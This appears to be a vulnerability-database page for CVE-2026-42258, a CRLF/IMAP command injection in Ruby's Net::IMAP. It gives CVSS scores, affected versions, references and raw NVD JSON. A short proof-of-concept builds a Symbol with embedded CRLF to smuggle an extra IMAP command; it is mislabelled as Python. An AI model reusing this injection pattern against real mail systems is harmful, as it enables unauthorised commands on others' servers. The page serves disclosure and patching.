CVE-2026-42258

Description

Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, symbol arguments to commands are vulnerable to a CRLF Injection / IMAP Command injection via Symbol arguments passed to IMAP commands. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ruby-lang:net\:\:imap:*:*:*:*:*:ruby:*:* - VULNERABLE

Ruby Net::IMAP < 0.4.24

Ruby Net::IMAP < 0.5.14

Ruby Net::IMAP < 0.6.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

require 'net/imap'

# Simulating a vulnerable scenario connecting to an IMAP server
imap = Net::IMAP.new('imap.example.com')
imap.login('user', 'password')

# The vulnerability occurs when a Symbol containing CRLF is passed
# Attacker crafts a malicious symbol to inject commands
malicious_symbol = :"INBOX\r\nA001 LIST \"\" \"*\"\r\n"

# Before patch, this sends: 'A001 SELECT INBOX

A001 LIST "" *

'
# This injects a LIST command after the SELECT command
begin
  imap.select(malicious_symbol)
rescue => e
  puts "Exploit triggered: #{e.message}"
end

imap.disconnect

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42258
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42258
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42258/
[4] VulDB https://vuldb.com/cve/CVE-2026-42258
[5] https://github.com/ruby/net-imap/releases/tag/v0.4.24
[6] https://github.com/ruby/net-imap/releases/tag/v0.5.14
[7] https://github.com/ruby/net-imap/releases/tag/v0.6.4
[8] https://github.com/ruby/net-imap/security/advisories/GHSA-75xq-5h9v-w6px

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42258", "sourceIdentifier": "[email protected]", "published": "2026-05-09T20:16:28.623", "lastModified": "2026-05-18T18:02:35.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, symbol arguments to commands are vulnerable to a CRLF Injection / IMAP Command injection via Symbol arguments passed to IMAP commands. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}, {"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:net\\:\\:imap:*:*:*:*:*:ruby:*:*", "versionEndExcluding": "0.4.24", "matchCriteriaId": "05DB8FF3-7546-470A-BBB4-4DCAEAD83D6F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:net\\:\\:imap:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "0.5.0", "versionEndExcluding": "0.5.14", "matchCriteriaId": "2CCEB891-1D8F-4431-A79C-2A7560A84F4E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:net\\:\\:imap:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "0.6.0", "versionEndExcluding": "0.6.4", "matchCriteriaId": "9A6D1995-BFA3-490F-967D-252CA7BE2264"}]}]}], "references": [{"url": "https://github.com/ruby/net-imap/releases/tag/v0.4.24", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ruby/net-imap/releases/tag/v0.5.14", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ruby/net-imap/releases/tag/v0.6.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ruby/net-imap/security/advisories/GHSA-75xq-5h9v-w6px", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}